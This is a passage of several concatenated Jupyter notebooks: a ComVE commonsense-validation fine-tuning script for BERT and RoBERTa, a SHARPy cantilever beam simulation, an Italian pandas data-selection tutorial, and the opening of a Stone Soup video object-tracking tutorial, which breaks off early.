'../DataSet/Test Data/subtaskA_gold_answers.csv'
)
# -
# Let's have a look at the training data.
train_data = pd.concat([train_texts, train_labels], axis=1)
train_data.head()
# ### 2.2 Tokenization
# Define a function to get a tokenizer.
# +
from transformers import BertTokenizerFast, DistilBertTokenizerFast, RobertaTokenizerFast
def get_tokenizer(model_name):
if model_name.startswith("bert"):
return BertTokenizerFast.from_pretrained(model_name)
if model_name.startswith("distilbert"):
return DistilBertTokenizerFast.from_pretrained(model_name)
if model_name.startswith("roberta"):
return RobertaTokenizerFast.from_pretrained(model_name)
# -
# Define a function to do the tokenization.
def tokenization(model_name):
# Get tokenizer
tokenizer = get_tokenizer(model_name)
# Tokenization for texts
train_encodings = tokenizer(list(train_texts["Statement 0"]), list(train_texts["Statement 1"]), truncation=True, padding=True)
val_encodings = tokenizer(list(val_texts["Statement 0"]), list(val_texts["Statement 1"]), truncation=True, padding=True)
test_encodings = tokenizer(list(test_texts["Statement 0"]), list(test_texts["Statement 1"]), truncation=True, padding=True)
return train_encodings, val_encodings, test_encodings
# ### 2.3 Turn data into a Dataset object
# Define a Dataset class.
class ComVEDataset(torch.utils.data.Dataset):
def __init__(self, encodings, labels):
self.encodings = encodings
self.labels = labels
def __getitem__(self, idx):
item = {key: torch.tensor(val[idx]) for key, val in self.encodings.items()}
item['labels'] = torch.tensor(self.labels[idx])
return item
def __len__(self):
return len(self.labels)
# Define a function to get all dataset in the form of dataset objects.
# Note that, for different models, we need to use the corresponding tokenizer to process the text data.
def get_dataset(model_name):
# Tokenization for texts
train_encodings, val_encodings, test_encodings = tokenization(model_name)
# Turn encodings and labels into a Dataset object
train_dataset = ComVEDataset(train_encodings, train_labels)
val_dataset = ComVEDataset(val_encodings, val_labels)
test_dataset = ComVEDataset(test_encodings, test_labels)
dataset = {"train_dataset" : train_dataset, "val_dataset" : val_dataset, "test_dataset" : test_dataset}
return dataset
# ## 3. Loading the Model and Optimizer
# Define a function to load model.
# +
from transformers import BertForSequenceClassification, DistilBertForSequenceClassification, RobertaForSequenceClassification
def get_model(model_name):
if model_name.startswith("bert"):
model = BertForSequenceClassification.from_pretrained(model_name)
if model_name.startswith("distilbert"):
model = DistilBertForSequenceClassification.from_pretrained(model_name)
if model_name.startswith("roberta"):
model = RobertaForSequenceClassification.from_pretrained(model_name)
model.to(device)
return model
# -
# Define a function to load optimizer.
# +
from transformers import AdamW
def get_optimizer(model, optimizer_name, learning_rate):
if optimizer_name == "Adam":
return AdamW(model.parameters(), lr=learning_rate)
# -
# ## 4. Training and Evaluation
# Prepare some utility functions.
# Prediction function
def predict(outputs):
probabilities = torch.softmax(outputs["logits"], dim=1)
predictions = torch.argmax(probabilities, dim=1)
return predictions
# +
# Plot function
import matplotlib.pyplot as plt
def plot_loss_and_acc(train_loss_list, train_accuracy_list, val_loss_list, val_accuracy_list, save_name=None):
'''
Plot 1: Iteration vs Loss
'''
name = save_name.split("/")[-1]
print(name)
# X-axis
val_loss_X = (np.arange(len(val_loss_list))+1) * int(len(train_loss_list)/len(val_loss_list)) # This is to adjust the X-axis of val_loss. For each epoch, we only get one val_loss, but have len(train_dataset)/batchsize train_loss. Meanwhile, we can deduce that len(train_dataset)/batchsize = len(train_loss_list)/epoch = len(train_loss_list)/len(val_loss_list)
# plot minimum point of validation loss
epoch_of_min_loss = np.argmin(val_loss_list)
val_loss_min_point = (val_loss_X[epoch_of_min_loss], min(val_loss_list))
plt.axvline(x=val_loss_min_point[0], color='gray' , linestyle='--', linewidth=0.8)
# plt.axhline(y=val_loss_min_point[1], color='gray' , linestyle='--', linewidth=0.8)
plt.text(x=val_loss_min_point[0]*1.05, y=max(val_loss_list), s="epoch:%s" % (epoch_of_min_loss+1), va="top")
# plot curve
plt.plot(train_loss_list, label="Training Loss")
plt.plot(val_loss_X, val_loss_list, label="Validation Loss")
plt.xlabel("Iteration")
plt.ylabel("Loss")
plt.title("Loss vs. Iteration")
plt.legend()
# save the figure and display it
if store_img and save_name:
plt.savefig(save_name + "_Loss.png")
plt.show()
'''
Plot 2: Epoch vs Accuracy
'''
# X-axis
acc_X = np.arange(len(train_accuracy_list))+1
# plot maximum point of validation accuracy
val_acc_max_point = (acc_X[np.argmax(val_accuracy_list)], max(val_accuracy_list))
plt.axvline(x=val_acc_max_point[0], color='gray' , linestyle='--', linewidth=0.8)
plt.axhline(y=val_acc_max_point[1], color='gray' , linestyle='--', linewidth=0.8)
plt.scatter(x=val_acc_max_point[0], y=val_acc_max_point[1], color="gray")
# plt.text(x=val_acc_max_point[0]*0.98, y=val_acc_max_point[1]*1.05, s=tuple([round(x,2) for x in val_acc_max_point]), ha="right")
if val_acc_max_point[0] > len(acc_X)-3:
plt.text(x=val_acc_max_point[0]*0.98, y=val_acc_max_point[1]*0.98, s=round(val_acc_max_point[1],3),
ha="right", va="top")
else:
plt.text(x=val_acc_max_point[0]*1.02, y=val_acc_max_point[1]*0.98, s=round(val_acc_max_point[1],3),
ha="left", va="top")
# plot curve
plt.plot(acc_X, train_accuracy_list,"-", label="Training Accuracy")
plt.plot(acc_X, val_accuracy_list,"-", label="Validation Accuracy")
plt.xticks(acc_X)
plt.xlabel("Epoch")
plt.ylabel("Accuracy")
plt.title("Accuracy vs. Epoch")
plt.legend()
# save the figure and display it
if store_img and save_name:
plt.savefig(save_name + "_Accuracy.png")
plt.show()
# -
# Prepare the evaluation function.
# +
# Evaluation
import numpy as np
from torch.utils.data import DataLoader
from pandas.core.frame import DataFrame
def evaluate(model, dataset, batch_size=1, process_name=None, info=None):
# Get data by DataLoader
data_loader = DataLoader(dataset, batch_size=batch_size, shuffle=False)
# Start evaluation
model.eval()
with torch.no_grad():
correct = 0
count = 0
loss_list = list()
record = {"labels":list(), "predictions":list()}
pbar = tqdm(data_loader)
for batch in pbar:
input_ids = batch['input_ids'].to(device)
attention_mask = batch['attention_mask'].to(device)
labels = batch['labels'].to(device)
outputs = model(input_ids, attention_mask=attention_mask, labels=labels)
loss = outputs['loss']
# make predictions
predictions = predict(outputs)
# count accuracy
correct += predictions.eq(labels).sum().item()
count += len(labels)
accuracy = correct * 1.0 / count
# show progress along with metrics
pbar.set_postfix({
'Loss': '{:.3f}'.format(loss.item()),
'Accuracy': '{:.3f}'.format(accuracy),
'Process': process_name if process_name else 'Evaluation'
})
# record the loss for each batch
loss_list.append(loss.item())
# use TensorBoard to record the loss and accuracy
if store_tensorboard_event and info and process_name:
writer_tensorboard.add_scalars("Loss", {"_".join([process_name] + info[:-1]): loss.item()}, info[-1] )
writer_tensorboard.add_scalars("Accuracy", {"_".join([process_name] + info[:-1]): accuracy}, info[-1])
# record the results
record["labels"] += labels.cpu().numpy().tolist()
record["predictions"] += predictions.cpu().numpy().tolist()
pbar.close()
# Record the average loss and the final accuracy
eval_loss = np.mean(loss_list)
eval_accuracy = accuracy
# Convert evaluation record to a pandas DataFrame object
# pass
# df_record = DataFrame(record)
# df_record.columns = ["Ground Truth","Model Prediction"]
# df_record = None
return eval_loss, eval_accuracy, record
# -
# Prepare the training function.
# +
# Training
from torch.utils.data import DataLoader
def train(model, dataset, optimizer, batch_size=16, epoch=10, loss_function=None, target=None, info=None):
# Get training data by DataLoader
train_dataset = dataset.get("train_dataset")
train_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)
# Start training
model.train()
train_loss_list = list()
train_accuracy_list = list()
val_loss_list = list()
val_accuracy_list = list()
iteration = 0
for epoch_i in range(epoch):
print('Epoch %s/%s' % (epoch_i + 1, epoch))
time.sleep(0.3)
correct = 0
count = 0
loss_list = list()
pbar = tqdm(train_loader)
for batch in pbar:
optimizer.zero_grad()
input_ids = batch['input_ids'].to(device)
attention_mask = batch['attention_mask'].to(device)
labels = batch['labels'].to(device)
outputs = model(input_ids, attention_mask=attention_mask, labels=labels)
loss = outputs['loss']
loss.backward()
optimizer.step()
# make predictions
predictions = predict(outputs)
# count accuracy
correct += predictions.eq(labels).sum().item()
count += len(labels)
accuracy = correct * 1.0 / count
# show progress along with metrics
pbar.set_postfix({
'Loss': '{:.3f}'.format(loss.item()),
'Accuracy': '{:.3f}'.format(accuracy),
'Process': 'Training'
})
# record the loss for each batch
loss_list.append(loss.item())
# use TensorBoard to record the loss and accuracy
if store_tensorboard_event and info:
iteration += 1
writer_tensorboard.add_scalars("Loss", {"_".join(["Training"] + info): loss.item()}, iteration)
writer_tensorboard.add_scalars("Accuracy", {"_".join(["Training"] + info): accuracy}, iteration)
pbar.close()
# record the training loss and accuracy for each epoch
train_loss_list += loss_list
train_accuracy_list.append(accuracy)
# Evaluation on validation dataset
val_dataset = dataset.get("val_dataset")
val_loss, val_accuracy, record = evaluate(model, val_dataset, batch_size=batch_size,
process_name="Validation", info=info+[iteration])
val_loss_list.append(val_loss)
val_accuracy_list.append(val_accuracy)
return train_loss_list, train_accuracy_list, val_loss_list, val_accuracy_list, record
# -
# ## 5. Experiment
# +
import csv
import os
# Settings: whether to store the experiment results.
store_img = True
store_tensorboard_event = True
"""
Select the Model and the Hyperparameters
"""
# Select the model.
# Check the Pretrained models on https://huggingface.co/transformers/pretrained_models.html
# Options: ["bert-base-uncased" , "distilbert-base-uncased", "roberta-base", "roberta-large"]
model_name = "roberta-large"
# Select the optimizer.
optimizer_name = 'Adam'
# Select the loss function.
loss_name = 'CrossEntropy'
# Select the learning rate list.
# learning_rate_list = [10,1,1e-1,1e-2,1e-3,1e-4,1e-5,1e-6] # learning rate list
learning_rate_list = [1e-5] # learning rate list
# Select the batch size list.
# batch_size_list = [2,4,8,16,32,64,128,256] # batch size list
batch_size_list = [128] # batch size list
# Select the epoch.
epoch = 15
"""
Start Experiments with Selected Model and Hyperparameters.
"""
# Get the dataset via using the specific model tokenizer.
dataset = get_dataset(model_name)
# Create a directory for this experiment.
task_directory = "ExperimentResult_A"
experiment_name = "_".join([time.strftime("%Y%m%d_%H%M", time.localtime()),
model_name.title(), optimizer_name, loss_name, "Epoch=%s" % epoch])
os.makedirs("./%s/%s" % (task_directory, experiment_name))
# Experiment and store the results in a CSV file.
file_name = "./%s/%s/%s.csv" % (task_directory, experiment_name, experiment_name)
with open(file_name, 'a', newline='') as file:
writer = csv.writer(file)
writer.writerow(["Model", "Optimizer", "Loss Function", "Learning Rate", "Batch Size", "Test Epoch",
"Training Loss", "Training Accuracy", "Validation Loss", "Validation Accuracy",
"Highest Accuracy", "Occurred in which Epoch"])
for learning_rate in learning_rate_list:
for batch_size in batch_size_list:
experiment_info = [model_name.title(), optimizer_name, loss_name,
"LearningRate=%s" % learning_rate, "BatchSize=%s" % batch_size, "Epoch=%s" % epoch]
print("Experiment:", " ".join(experiment_info))
# Initialize the model
model = get_model(model_name)
# Get the Optimizer
optimizer = get_optimizer(model, optimizer_name, learning_rate)
# Training
train_loss_list, train_accuracy_list, val_loss_list, val_accuracy_list, record = train(
model = model,
dataset = dataset,
optimizer = optimizer,
batch_size = batch_size,
epoch = epoch,
info = experiment_info
)
# Plot the result
save_name = "./%s/%s/%s" % (task_directory, experiment_name, "_".join(experiment_info))
plot_loss_and_acc(train_loss_list, train_accuracy_list, val_loss_list, val_accuracy_list, save_name)
# Record the validation result
writer.writerow([model_name.title(), optimizer_name, loss_name, learning_rate, batch_size, epoch,
train_loss_list, train_accuracy_list, val_loss_list, val_accuracy_list,
max(val_accuracy_list), np.argmax(val_accuracy_list)+1])
torch.cuda.empty_cache()
# +
# Display the Confusion Matrix of the last experiment result.
import seaborn as sns
# Convert test record to a pandas DataFrame object
df_record = DataFrame(record)
df_record.columns = ["Ground Truth","Model Prediction"]
# Display the Confusion Matrix
crosstab = pd.crosstab(df_record["Ground Truth"],df_record["Model Prediction"])
sns.heatmap(crosstab, cmap='Oranges', annot=True, fmt='g', linewidths=5)
accuracy = df_record["Ground Truth"].eq(df_record["Model Prediction"]).sum() / len(df_record["Ground Truth"])
plt.title("Confusion Matrix (Accuracy: %s%%)" % round(accuracy*100,2))
plt.show()
| MSc Project/Experiment/Experiment_Subtask_A.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # A prismatic cantilever beam under a tip load
#
# This is an example of the geometrically-exact beam structural solver in SHARPy.
#
# Reference:
# <NAME>., <NAME>., “Numerical Aspects of Nonlinear Flexible Aircraft Flight Dynamics Modeling.” 54th AIAA/ASME/ASCE/AHS/ASC Structures, Structural Dynamics and Materials Conference, 8-11 April 2013, Boston, Massachusetts, USA [http://hdl.handle.net/10044/1/11077, http://dx.doi.org/10.2514/6.2013-1634]
# ## Required Packages
# +
import numpy as np
import os
import matplotlib.pyplot as plt
import sharpy.sharpy_main # used to run SHARPy from Jupyter
import model_static_cantilever as model # model definition
from IPython.display import Image
plt.rcParams.update({'font.size': 20}) # Large fonts in all plots
# -
# ## Problem 1: Tip vertical dead load
# Consider first a massless beam with a heavy tip mass, such that the deformations are due to the resulting dead load P. The static equilibrium will be obtained for multiple values of P=0, 100, ..., 1000 kN
Image('images/cantilever.png', width=500)
# +
# Define temporary files to generate sharpy models.
case_name= 'temp'
route = './'
Nforces=10 # Number of force steps
DeltaForce=100e3 # Increment of forces
Nelem=20 # Number of beam elements
N=2*Nelem+1
x1=np.zeros((Nforces,N))
z1=np.zeros((Nforces,N))
#Loop through all external forces
for jForce in range(Nforces):
model.clean_test_files(route, case_name)
model.generate_fem_file(route, case_name, Nelem, float(jForce+1)*DeltaForce)
model.generate_solver_file(route,case_name)
case_data=sharpy.sharpy_main.main(['', route + case_name + '.sharpy'])
x1[jForce,0:N]=case_data.structure.timestep_info[0].pos[:, 0]
z1[jForce,0:N]=case_data.structure.timestep_info[0].pos[:, 2]
#Store initial geometry
x0=case_data.structure.ini_info.pos[:, 0]
z0=case_data.structure.ini_info.pos[:, 2]
# +
# Plot the deformed beam shapes
fig= plt.subplots(1, 1, figsize=(15, 6))
plt.scatter(x0,z0,c='black')
plt.plot(x0,z0,c='black')
for jForce in range(Nforces):
plt.scatter(x1[jForce,0:N],z1[jForce,0:N],c='black')
plt.plot(x1[jForce,0:N],z1[jForce,0:N],c='black')
plt.axis('equal')
plt.grid()
plt.xlabel('x (m)')
plt.ylabel('z (m)')
plt.savefig("images/ncb1-dead-displ.eps", format='eps', dpi=1000, bbox_inches='tight')
# -
print('{:>8s}{:>12s}'.format('Force','Tip z'))
dash=20*'-'; print(dash)
for jForce in range(Nforces):
print('{:>8.0f}{:>12.4f}'.format((jForce+1)*DeltaForce,z1[jForce,N-1]))
model.clean_test_files(route, case_name)
# ## Problem 2: Comparing follower and dead forces
#Loop through all external follower forces, again applied at the tip.
x2=np.zeros((Nforces,N))
z2=np.zeros((Nforces,N))
for jForce in range(Nforces):
model.clean_test_files(route, case_name)
model.generate_fem_file(route, case_name, Nelem, 0, -float(jForce+1)*DeltaForce)
model.generate_solver_file(route,case_name)
case_foll=sharpy.sharpy_main.main(['', route + case_name + '.sharpy'])
x2[jForce,0:N]=case_foll.structure.timestep_info[0].pos[:, 0]
z2[jForce,0:N]=case_foll.structure.timestep_info[0].pos[:, 2]
# +
#Plot results.
fig, axs = plt.subplots(nrows=1, ncols=2, figsize=(15, 6))
ax0 = axs[0]
ax0.plot([0,Nforces],[0, 0],linestyle=':', c='black')
ax0.plot(range(Nforces+1), np.concatenate((5, x1[0:Nforces,-1]), axis=None)-5*np.ones(Nforces+1),linestyle='-', c='black')
ax0.plot(range(Nforces+1), np.concatenate((5, x2[0:Nforces,-1]), axis=None)-5*np.ones(Nforces+1),linestyle='--', c='black')
#ax0.axis('equal')
ax0.grid()
ax0.set_xlabel('Force (N) x 10^5')
ax0.set_ylabel('Tip horizontal displacement (m)')
ax0.set(xlim=(0, Nforces), ylim=(-6, 1))
ax1 = axs[1]
ax1.plot([0,Nforces],np.concatenate((0, z1[0,-1]*Nforces), axis=None),linestyle=':', c='black')
ax1.plot(range(Nforces+1), np.concatenate((0, z1[0:Nforces,-1]), axis=None),linestyle='-', c='black')
ax1.plot(range(Nforces+1), np.concatenate((0, z2[0:Nforces,-1]), axis=None),linestyle='--', c='black')
#ax1.axis('equal')
ax1.grid()
ax1.set_xlabel('Force (N) x 10^5')
ax1.set_ylabel('Tip vertical displacement (m)')
ax1.set(xlim=(0, Nforces), ylim=(-5, 1))
ax1.legend(['Linear','Dead','Follower'])
fig.savefig("images/ncb1-foll-displ.eps", format='eps', dpi=1000, bbox_inches="tight")
# -
model.clean_test_files(route, case_name)
| docs/source/content/example_notebooks/cantilever/static_cantilever.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <a id='start'></a>
# # Collecting
#
# In questo notebook vengono spiegati i principali metodi per raccogliere ed effettuare una prima manipolazione sui dati. <br>
# La libreria più usata per effettuare queste operazioni principali è **Pandas**. <br>
# <br>
# Il notebook è suddiviso nelle seguenti sezioni:<br>
# - [DataFrame e Series](#section1)<a href='#section1'></a>; <br>
# - [Importare i dati dall'esterno](#section2)<a href='#section2'></a>; <br>
# - [Selezionare i dati del dataset](#section3)<a href='#section3'></a>; <br>
# - [Index - based Selection](#section4)<a href='#section4'></a><br>
# - [Label - based Selection](#section5)<a href='#section5'></a> <br>
# - [Conditional Selection](#section6)<a href='#section6'></a>
# <a id='section1'></a>
# ## DataFrame e Series
# Introduciamo la libreria **Pandas**, utilizzata per creare e gestire gli oggetti: **Series** e **Dataframe**.<br>
#
# Gli oggetti *Series* e *Dataframe* possono essere importati da file (csv, xls, html, ..) oppure creati manualmente. <br>
#
# Importiamo inizialmente la libreria Pandas
# +
import pandas as pd
print("Setup Complete.")
# -
# Un **DataFrame** è una tabella che contiene un array di singole voci, ognuna delle quali ha un certo valore. Ogni voce corrisponde ad una riga (o record) e ad una colonna.
pd.DataFrame({'Yes': [50, 21], 'No': [131, 2]})
# Un DataFrame può contenere anche caratteri stringa e non solo valori numerici
pd.DataFrame({'Audi': ['Migliore', 'Peggiore'], 'Mercedes': ['Peggiore', 'Migliore']})
# Le righe di un DataFrame prendono il nome di **Index** ed è possibile assegnargli un valore tramite il seguente codice:
pd.DataFrame({'Audi': ['Migliore', 'Peggiore'], 'Mercedes':['Peggiore', 'Migliore']}, index = ['Utilitaria', 'Sportiva'])
# Una **Series**, è una sequenza di valori di dati. Se un DataFrame è una tabella, una serie è una lista.
pd.Series([1, 2, 3, 4, 5])
# È possibile assegnare dei valori alle righe di una Series allo stesso modo di prima, utilizzando un parametro indice. <br>
# Inoltre, una Series non ha un nome di colonna, ma ha solo un nome complessivo
pd.Series([300, 450, 400], index=['2015 Sales', '2016 Sales', '2017 Sales'], name='Product X')
# <a id='section2'></a>
# ## Importare i dati dall'esterno
# In questa sezione del notebook ci occupiamo di come importare i dati da risorse esterne (csv, excel e html) grazie alla libreria Pandas.
# ### Importare dati da un csv
# Il metodo da utilizzare per importare i dati da un csv con la libreria Pandas è __[read_csv](https://pandas.pydata.org/pandas-docs/stable/generated/pandas.read_csv.html)__. <br>
# Ci sono molti parametri per il metodo *read_csv*, i più importanti sono:
# - sep
# - delimeter
# - header
# - index_col
# - skiprows
# - na_values <br>
# ...
dataset = pd.read_csv("dataset.csv", index_col = 0)
dataset
# Il metodo .head() permette di vedere le prime righe (di default le prime 5) di un DataFrame o di una Series
dataset.head()
# il metodo .tail() permette di vedere le ultime righe (di default le prime 5) di un DataFrame o di una Series
dataset.tail()
# ### Importare dati da un file excel
# Il metodo da utilizzare per importare i dati da un file excel con la libreria Pandas è __[read_excel](https://pandas.pydata.org/pandas-docs/stable/generated/pandas.read_excel.html)__. <br>
# In questo caso sarà necessario indicare in quale sheet del file excel si trova il dataframe che vogliamo importare utilizzando il parametro *sheet_name*.
dataset = pd.read_excel("dataset_excel_workbook.xlsx", sheet_name='dataset', index_col=0)
dataset
# ### Importare dati da un sito web
# Il metodo da utilizzare per importare una tabella da un sito web con la libreria Pandas è __[read_html](https://pandas.pydata.org/pandas-docs/stable/generated/pandas.read_html.html#pandas.read_html)__. <br>
#
# I parametri più importanti da considerare nel momento in cui si fa l'import sono i seguenti: <br>
# - **skiprows** = indica il numero di righe da saltare nell'importazione; <br>
# - **header** = indica la riga da utilizzare per creare le intestazioni delle colonne.
classifica_serie_a = pd.read_html(io="http://www.legaseriea.it/it/serie-a/classifica", skiprows=1, header=0)
classifica_serie_a
# La funzione *read_html* ritorna come oggetto una *lista di DataFrame*. <br>
# Possiamo a questo punto associare la lista di Dataframe identificata dall'elemento 0 dell'oggetto ottenuto da *read_html*.
serie_a = classifica_serie_a[0]
serie_a.head()
# È possibile ottenere i nomi delle colonne che formano un Dataframe o una Series attraverso l'attributo **.columns**
serie_a.columns
type(serie_a)
serie_a
# <a id='section3'></a>
# ## Selezionare i dati del dataset
# In questa sezione impareremo i principali metodi per selezionare le colonne e le righe di un dataset, identificato sottoforma di DataFrame o Series.
# Prima di continuare è necessario precisare che la libreria **Pandas** _non_ utilizza la denominazione, che viene usata comunemente per individuare gli assi di un database, ovvero *dimension* e *feature*. <br>
# La libreria Pandas indica le dimensioni di una matrice, con il termine **axes**, ovvero utilizza il parametro **(axis = 0)** per indicare le righe di un dataset ed il parametro **(axis = 1)** per indicare le colonne di un dataset.
# <img src="axis_Pandas.jpg">
# Rinomiamo il dataset importato precedentemente tramite file excel
titanic = dataset
titanic.head()
# +
# Selezioniamo la colonna Age del dataset titanic
titanic['Age'] # è possibile usare anche titanic.Age
# -
# Nella cella precedente abbiamo selezionato una colonna da un DataFrame ed è stata estratta assegnandole il formato **Series**. <br>
# Abbiamo indicato due metodi per estrarre una colonna da un DataFrame, nessuno dei due è il migliore ma qualora il nome della colonna avesse uno spazio, ad esempio supponiamo fosse "Age Female", in quel caso dovremmo usare la notazione con le parentesi quadre.
# Selezioniamo ora la prima riga della colonna Age
titanic['Age'][1]
# Pandas utilizza due paradigmi per selezionare i dati: <br>
# - Index-based: ovvero basandosi sulla posizione numerica dei dati; <br>
# - Label-based: ovvero basandosi sul valore di un indice dei dati.
# <a id='section4'></a>
# ### Index-Based Selection
# Il codice che si utilizza per effettuare una *index-based selection* è **iloc**.<br>
# Ad esempio, selezioniamo la prima riga del dataset sul titanic:
titanic.iloc[0]
# Sia il metodo **iloc** che **loc** (che vedremo dopo) sono *row-first, column-second* ovvero considerano come primo input il valore della riga e come secondo quello della colonna. Questo funzionamento è opposto al tradizionale comportamento di Python, che è *column-first, row-second*. <br>
# Infatti poche righe sopra, prima di introdurre *iloc* e *loc* abbiamo usato il codice "titanic['Age'][1]", ovvero dataset[colonna][riga].
#
# Per ottenere la colonna desiderata con iloc dobbiamo utilizzare la seguente sintassi:
# Stampo TUTTE le righe della colonna dei nomi
titanic.iloc[:,1]
# Stampo le prime 3 righe della colonna dei nomi
titanic.iloc[:3,1]
# Stampo le righe che mi interessano della colonna dei nomi
# In questo caso utilizzo una lista per indicare le righe che mi interessano
titanic.iloc[[1,2,3,5,7],1]
# <a id='section5'></a>
# ### Label-Based Selection
# Il codice che si utilizza per effettuare una *label-based selection* è **loc**.<br>
# Per ottenere il primo record del campo "Name" del dataset sul titanic dobbiamo utilizzare la seguente sintassi:
titanic.loc[1, 'Name']
titanic.loc[2, ['Name', 'Age', 'Pclass']]
# Quando si sceglie o si passa da *loc* a *iloc*, c'è una **differenza** che è importante tenere a mente, cioè che **i due metodi utilizzano schemi di indicizzazione leggermente diversi**.<br>
#
# **iloc** utilizza lo schema di indicizzazione Python stdlib: dove **il primo elemento del range è incluso e l'ultimo escluso.** Quindi iloc[0:10] selezionerà le voci 0,.....,9. <br>
# **loc**, nel frattempo, **indicizza in modo inclusivo.** Così loc[0:10] selezionerà le voci 0,.....,10.
#
# Supponiamo di avere un DataFrame con un semplice elenco numerico, ad esempio 0,......1000. In questo caso df.iloc[0:1000] restituirà 1000 voci, mentre df.loc[0:1000] ne restituirà 1001! Per ottenere 1000 elementi usando loc, dovremo utilizzare df.loc[0:999].
#
# <a id='section6'></a>
# ### Conditional Selection
# Durante le nostre analisi potremo aver bisogno di selezionare parti di un dataset sulla base dei valori che possono assumere i campi. Ovvero voler porre delle condizioni alle nostre selezioni.
# Supponiamo di voler selezionare dal dataset del titanic solo le donne; iniziamo chiedendoci quali sono le righe che hanno come campo della colonna "Sex" il valore di "female":
titanic.Sex == "female"
# Abbiamo ottenuto una colonna di True/False che possiamo utilizzare con l'operatore *loc* per selezionare nel dataset i campi riferiti solo alle donne:
titanic.loc[titanic.Sex == "female"]
# Supponiamo ora di voler selezionare le donne che hanno meno di 30 anni:
# utilizziamo l'operatore logico &
titanic.loc[(titanic.Sex == "female") & (titanic.Age < 30)]
# Supponiamo di voler selezionare le femmine oppure tutti quelli che hanno meno di 30 anni, in questo caso sarà necessario utilizzare l'operatore **or**: |
titanic.loc[(titanic.Sex == "female") | (titanic.Age < 30)]
# Pandas ha dei *conditional selector* pre-costruiti che possono essere utili durante le analisi:<br>
# - **isin**: permette di selezionare i dati il cui valore è in una lista di valori; <br>
# - **isnull** (ed il suo complementare **notnull**: permette di selezionare i valori che sono o meno nulli (NaN).
#
# Supponiamo di voler selezionare solo le persone che appartengono alla seconda e terza classe (campo Pclass).
titanic.loc[titanic.Pclass.isin([2,3])]
# Supponiamo di voler selezionare tutti i passeggeri che hanno età nulla:
titanic.loc[titanic.Age.isnull()]
# A questo punto possiamo anche associare un valore ad un campo una volta effettuata una selezione. <br>
# Assegniamo a tutte le persone che hanno un valore di età nullo, l'età di 35 anni.
titanic.loc[titanic.Age.isnull(), 'Age'] = 35
titanic
# Di seguito alcuni link utili: <br>
# - <a href='https://pandas.pydata.org/pandas-docs/stable/indexing.html'>Pandas - Indexing and Selecting Data</a><br>
# - <a href='https://pandas.pydata.org/pandas-docs/stable/comparison_with_sql.html'>Pandas - Comparison with Sql</a><br>
# [Clicca qui per tornare all'inizio della pagina](#start)<a id='start'></a>
# Con questo paragrafo si conclude il notebook "Collecting", il prossimo notebook sarà "Wrangling".
# Per eventuali dubbi ci potete scrivere su Teams!<br>
# A presto!
| Italiano/old/01_Collecting/Collecting.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %matplotlib inline
#
# Video processing, Object detection & Tracking
# ==============================================
#
# **Demonstrating the video processing capabilities of Stone Soup**
#
# This notebook will guide you progressively through the steps necessary to:
#
# 1. Use the Stone Soup :class:`~.FrameReader` components to open and process video data;
# 2. Use the :class:`~.TensorFlowBoxObjectDetector` to detect objects in video data, making use of Tensorflow object detection models;
# 3. Build a :class:`~.MultiTargetTracker` to perform tracking of multiple object in video data.
#
#
#
# Software dependencies
# ---------------------
# Before we begin with this tutorial, there are a few things that we need to install in order to
# proceed.
#
# FFmpeg
# ~~~~~~
# FFmpeg is a free and open-source project consisting of a vast software suite of libraries and
# programs for handling video, audio, and other multimedia files and streams. Stone Soup (or more
# accurately some of its extra dependencies) make use of FFmpeg to read and output video. Download
# links and installation instructions for FFmpeg can be found `here <https://www.ffmpeg.org/download.html>`__.
#
# TensorFlow
# ~~~~~~~~~~
# TensorFlow is a free and open-source software library for dataflow and differentiable programming
# across a range of tasks, such machine learning. TensorFlow includes an Object Detection API that
# makes it easy to construct, train and deploy object detection models, as well as a collection of
# pre-trained models that can be used for out-of-the-box inference. A quick TensorFlow installation
# tutorial can be found `here <https://tensorflow2objectdetectioninstallation.readthedocs.io/en/latest/>`__.
#
# Stone Soup
# ~~~~~~~~~~
# To perform video-processing using Stone Soup, we need to install some extra dependencies. The
# easiest way to achieve this is by running the following commands in a Terminal window:
#
# .. code::
#
# git clone "https://github.com/dstl/Stone-Soup.git"
# cd Stone-Soup
# python -m pip install -e .[dev,video,tensorflow]
#
# Pytube
# ~~~~~~
# We will also use pytube_ to download a Youtube video for the purposes of this tutorial. In the
# same Terminal window, run the following command to install ``pytube``:
#
# .. code::
#
# pip install pytube3
#
#
# Using the Stone Soup :class:`~.FrameReader` classes
# ---------------------------------------------------
# The :class:`~.FrameReader` abstract class is intended as the base class for Stone Soup readers
# that read frames from any form of imagery data. As of now, Stone Soup has two implementations of
# :class:`~.FrameReader` subclasses:
#
# 1. The :class:`~.VideoClipReader` component, which uses MoviePy_ to read video frames from a file.
# 2. The :class:`~.FFmpegVideoStreamReader` component, which uses ffmpeg-python_ to read frames from real-time video streams (e.g. RTSP).
#
# In this tutorial we will focus on the :class:`~.VideoClipReader`, since setting up a stream for
# the :class:`~.FFmpegVideoStreamReader` is more involved. Nevertheless, the use and interface of
# the two readers is mostly identical after initialisation and an example of how to initialise the
# later will also be provided
#
#
# Download and store the video
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# First we will download the video that we will use throughout this tutorial. The code snippet
# shown bellow will download the video and save it your working directory as ``sample1.mp4``.
#
#
# +
import os
from pytube import YouTube
VIDEO_FILENAME = 'sample1'
VIDEO_EXTENTION = '.mp4'
VIDEO_PATH = os.path.join(os.getcwd(), VIDEO_FILENAME+VIDEO_EXTENTION)
if not os.path.exists(VIDEO_PATH):
yt = YouTube('http://www.youtube.com/watch?v=MNn9qKG2UFI')
yt.streams[0].download(filename=VIDEO_FILENAME)
# -
# Building the video reader
# ~~~~~~~~~~~~~~~~~~~~~~~~~
#
# VideoClipReader
# ***************
# We will use the :class:`~.VideoClipReader` class to read and replay the downloaded file. We also
# configure the reader to only replay the clip for the a duration of 2 seconds between `00:10` and
# `00:12`.
#
#
import datetime
from stonesoup.reader.video import VideoClipReader
start_time = datetime.timedelta(minutes=0, seconds=10)
